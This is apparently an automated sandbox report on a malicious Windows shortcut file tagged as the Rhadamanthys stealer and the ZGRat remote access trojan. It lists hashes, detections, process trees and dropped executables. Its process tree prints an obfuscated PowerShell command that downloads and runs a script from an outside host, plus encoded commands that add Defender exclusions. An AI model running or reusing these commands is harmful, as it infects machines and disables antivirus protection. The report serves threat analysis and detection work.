rhadamanthys | b58b42739a60da518b3cfe6ccda1755372b36ece77f14fbb2c1c4661a1df3fc6

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09-05-2024 20:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2b9a64f8e7b800ea300fbb68500a3184_JaffaCakes118.lnk
Size

2KB
MD5

2b9a64f8e7b800ea300fbb68500a3184
SHA1

18191da11de186380771db4e67abe007d26f9942
SHA256

b58b42739a60da518b3cfe6ccda1755372b36ece77f14fbb2c1c4661a1df3fc6
SHA512

8768f281aa085f2ca8dd7f23cf79901f265a3a00e6b05913015744f99e1bb42789138ec6a7ccf6a53e6947c42c0f130742ba85836f4319390a40d31d3b57b6c2

Score

10^/10

rhadamanthys zgrat execution rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://timecheck.ug/ppx.ps1

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral1/memory/2200-73-0x0000000005010000-0x00000000054C0000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-74-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-89-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-91-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-117-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-115-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-113-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-133-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-131-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-129-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-127-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-125-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-121-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-111-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-109-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-107-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-105-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-103-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-99-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-95-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-93-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-123-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-119-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-102-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-98-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-87-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-85-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-83-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-82-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-79-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-77-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2200-76-0x0000000005010000-0x00000000054BB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2588-4989-0x0000000004B00000-0x0000000004DB8000-memory.dmp	family_zgrat_v1
behavioral1/memory/2940-9891-0x00000000023E0000-0x00000000024C8000-memory.dmp	family_zgrat_v1

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1936 created 1224	1936	bvasdvdfsds.exe	21
PID 2984 created 1224	2984	dfgdvdfsds.exe	21
PID 3552 created 1224	3552	cvbfsds.exe	21
PID 3316 created 1224	3316	bvcfsds.exe	21

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2552	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
7508	powershell.exe
6476	powershell.exe
2552	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
1720	imgo.exe
2548	imgo.exe
2200	bvasdvdfsds.exe
2588	BLHisbnd.exe
1936	bvasdvdfsds.exe
2940	BLHisbnd.exe
7644	dfgdvdfsds.exe
2984	dfgdvdfsds.exe
3332	Tags.exe
3056	Tags.exe
2752	cvbfsds.exe
3552	cvbfsds.exe
4616	bvcfsds.exe
3316	bvcfsds.exe

Loads dropped DLL 10 IoCs

pid	Process
2548	imgo.exe
2200	bvasdvdfsds.exe
2200	bvasdvdfsds.exe
2588	BLHisbnd.exe
2548	imgo.exe
7644	dfgdvdfsds.exe
2548	imgo.exe
2752	cvbfsds.exe
2548	imgo.exe
4616	bvcfsds.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2548	imgo.exe
2548	imgo.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 1720 set thread context of 2548	1720	imgo.exe	31
PID 2200 set thread context of 1936	2200	bvasdvdfsds.exe	36
PID 2588 set thread context of 2940	2588	BLHisbnd.exe	37
PID 7644 set thread context of 2984	7644	dfgdvdfsds.exe	45
PID 3332 set thread context of 3056	3332	Tags.exe	51
PID 3056 set thread context of 4320	3056	Tags.exe	52
PID 4320 set thread context of 1720	4320	MSBuild.exe	54
PID 2752 set thread context of 3552	2752	cvbfsds.exe	55
PID 4616 set thread context of 3316	4616	bvcfsds.exe	60

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2552	powershell.exe
1936	bvasdvdfsds.exe
1936	bvasdvdfsds.exe
2076	dialer.exe
2076	dialer.exe
2076	dialer.exe
2076	dialer.exe
7508	powershell.exe
2984	dfgdvdfsds.exe
2984	dfgdvdfsds.exe
1124	dialer.exe
1124	dialer.exe
1124	dialer.exe
1124	dialer.exe
3056	Tags.exe
3056	Tags.exe
3552	cvbfsds.exe
3552	cvbfsds.exe
6512	dialer.exe
6512	dialer.exe
6512	dialer.exe
6512	dialer.exe
6476	powershell.exe
3316	bvcfsds.exe
3316	bvcfsds.exe
5084	dialer.exe
5084	dialer.exe
5084	dialer.exe
5084	dialer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1720	imgo.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2200	bvasdvdfsds.exe
Token: SeDebugPrivilege	2200	bvasdvdfsds.exe
Token: SeDebugPrivilege	2588	BLHisbnd.exe
Token: SeDebugPrivilege	2588	BLHisbnd.exe
Token: SeDebugPrivilege	2940	BLHisbnd.exe
Token: SeDebugPrivilege	7508	powershell.exe
Token: SeDebugPrivilege	7644	dfgdvdfsds.exe
Token: SeDebugPrivilege	7644	dfgdvdfsds.exe
Token: SeDebugPrivilege	3332	Tags.exe
Token: SeDebugPrivilege	3332	Tags.exe
Token: SeDebugPrivilege	3056	Tags.exe
Token: SeDebugPrivilege	4320	MSBuild.exe
Token: SeDebugPrivilege	2752	cvbfsds.exe
Token: SeDebugPrivilege	4320	MSBuild.exe
Token: SeDebugPrivilege	1720	MSBuild.exe
Token: SeDebugPrivilege	2752	cvbfsds.exe
Token: SeDebugPrivilege	4616	bvcfsds.exe
Token: SeDebugPrivilege	4616	bvcfsds.exe
Token: SeDebugPrivilege	6476	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1720	imgo.exe
2548	imgo.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2964 wrote to memory of 2552	2964	cmd.exe	29
PID 2964 wrote to memory of 2552	2964	cmd.exe	29
PID 2964 wrote to memory of 2552	2964	cmd.exe	29
PID 2552 wrote to memory of 1720	2552	powershell.exe	30
PID 2552 wrote to memory of 1720	2552	powershell.exe	30
PID 2552 wrote to memory of 1720	2552	powershell.exe	30
PID 2552 wrote to memory of 1720	2552	powershell.exe	30
PID 1720 wrote to memory of 2548	1720	imgo.exe	31
PID 1720 wrote to memory of 2548	1720	imgo.exe	31
PID 1720 wrote to memory of 2548	1720	imgo.exe	31
PID 1720 wrote to memory of 2548	1720	imgo.exe	31
PID 1720 wrote to memory of 2548	1720	imgo.exe	31
PID 2548 wrote to memory of 2200	2548	imgo.exe	34
PID 2548 wrote to memory of 2200	2548	imgo.exe	34
PID 2548 wrote to memory of 2200	2548	imgo.exe	34
PID 2548 wrote to memory of 2200	2548	imgo.exe	34
PID 2200 wrote to memory of 2588	2200	bvasdvdfsds.exe	35
PID 2200 wrote to memory of 2588	2200	bvasdvdfsds.exe	35
PID 2200 wrote to memory of 2588	2200	bvasdvdfsds.exe	35
PID 2200 wrote to memory of 2588	2200	bvasdvdfsds.exe	35
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2200 wrote to memory of 1936	2200	bvasdvdfsds.exe	36
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 2588 wrote to memory of 2940	2588	BLHisbnd.exe	37
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 1936 wrote to memory of 2076	1936	bvasdvdfsds.exe	38
PID 7476 wrote to memory of 7508	7476	taskeng.exe	42
PID 7476 wrote to memory of 7508	7476	taskeng.exe	42
PID 7476 wrote to memory of 7508	7476	taskeng.exe	42
PID 2548 wrote to memory of 7644	2548	imgo.exe	44
PID 2548 wrote to memory of 7644	2548	imgo.exe	44
PID 2548 wrote to memory of 7644	2548	imgo.exe	44
PID 2548 wrote to memory of 7644	2548	imgo.exe	44
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45
PID 7644 wrote to memory of 2984	7644	dfgdvdfsds.exe	45

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1224
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\2b9a64f8e7b800ea300fbb68500a3184_JaffaCakes118.lnk
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/ppx.ps1');s $nq
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Users\Public\imgo.exe
      "C:\Users\Public\imgo.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1720
    - - C:\Users\Public\imgo.exe
        
        "C:\Users\Public\imgo.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2548
      - C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1936
      - C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2984
      - C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3552
      - C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3316
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2076
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1124
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6512
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5084

C:\Windows\system32\taskeng.exe
taskeng.exe {63795AA7-2406-444E-9F8A-E88374DB9829} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:7476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:7508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6476

C:\Windows\system32\taskeng.exe
taskeng.exe {DF1259D8-F4E9-4DE2-8829-3BE9F7D1CE75} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
1⤵
PID:3204
- C:\Users\Admin\AppData\Local\Remaining\vwbmdfpz\Tags.exe
  C:\Users\Admin\AppData\Local\Remaining\vwbmdfpz\Tags.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3332
- - C:\Users\Admin\AppData\Local\Remaining\vwbmdfpz\Tags.exe
    "C:\Users\Admin\AppData\Local\Remaining\vwbmdfpz\Tags.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      4⤵
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:4320
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe

Filesize
3.4MB

MD5
e13e6f7986b9d1eff55fe30133592c40

SHA1
8299d50b76990e9dc7e0a8cc67e2f4d44cb810f5

SHA256
407e9094206a37707a368f4cd0103269c50b8c0c03edba87b4f20664d259f207

SHA512
bb41209d410ff38c01279d119f646658e363a3055a4f152b6a2c76b9cdb1fb42441b243fa8f7fb7a353a1b0e78c619e499274185f40d8592e43551da46bd97a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe

Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2eb40549711abdc1a800b2e26ead8ae2

SHA1
6192f80de24044982d4d85b8225d4ee63d515690

SHA256
04565f9df1dfdec14fc497a30ef1ac43d8db55fbbe6b6aaaa3401a101412634c

SHA512
a92f60456a7af67b1d5d5d2484d7f1f56f7659406c11bf2966848a7846174ba31e90fac5a7f56421b7557d900cd34916cf001064dd4c712e5e4ec6a7f8e06809

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NMPCTS8C0U564GDAJZCB.temp

Filesize
7KB

MD5
6f39e94ea66f49f7ddcc0ce28e0c0b01

SHA1
412aa123efa7fe6ca285eaae86f8c728beea077c

SHA256
86ac484ca924ae87a8c95b530a8cd27c929fba5ab4f17070b6c9751e7c0168ff

SHA512
8ccb1b5a3f70bc376da2d68663e56d20175460a2b5af6040eb55f3d4ece311f94dc39364e7f1000395205ab5df2b89a268d68a93c7025f7a99a7973b840aff6d

Download Submit
C:\Users\Public\imgo.exe

Filesize
760KB

MD5
8333b78c2a3eacf8cfd843a7b62ce6ba

SHA1
81a4d7d00d04da14a6059ed068238a7e2321f721

SHA256
aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665

SHA512
c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27

Download Submit
memory/2200-119-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-111-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-72-0x0000000000100000-0x000000000065A000-memory.dmp

Filesize
5.4MB

Download
memory/2200-98-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-73-0x0000000005010000-0x00000000054C0000-memory.dmp

Filesize
4.7MB

Download
memory/2200-74-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-89-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-91-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-117-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-115-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-85-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-133-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-131-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-129-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-127-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-125-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-121-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-77-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-109-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-107-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-105-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-103-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-4955-0x0000000000B60000-0x0000000000BAC000-memory.dmp

Filesize
304KB

Download
memory/2200-4954-0x0000000006CC0000-0x0000000006FAC000-memory.dmp

Filesize
2.9MB

Download
memory/2200-99-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-95-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-93-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-123-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-87-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-102-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-4964-0x0000000000EE0000-0x0000000000F34000-memory.dmp

Filesize
336KB

Download
memory/2200-76-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-113-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-83-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-82-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2200-79-0x0000000005010000-0x00000000054BB000-memory.dmp

Filesize
4.7MB

Download
memory/2548-56-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2548-58-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2552-41-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-44-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-43-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-45-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-54-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-40-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2552-38-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp

Filesize
4KB

Download
memory/2552-42-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-39-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2588-4963-0x0000000000210000-0x0000000000570000-memory.dmp

Filesize
3.4MB

Download
memory/2588-4989-0x0000000004B00000-0x0000000004DB8000-memory.dmp

Filesize
2.7MB

Download
memory/2588-9870-0x00000000049A0000-0x0000000004A94000-memory.dmp

Filesize
976KB

Download
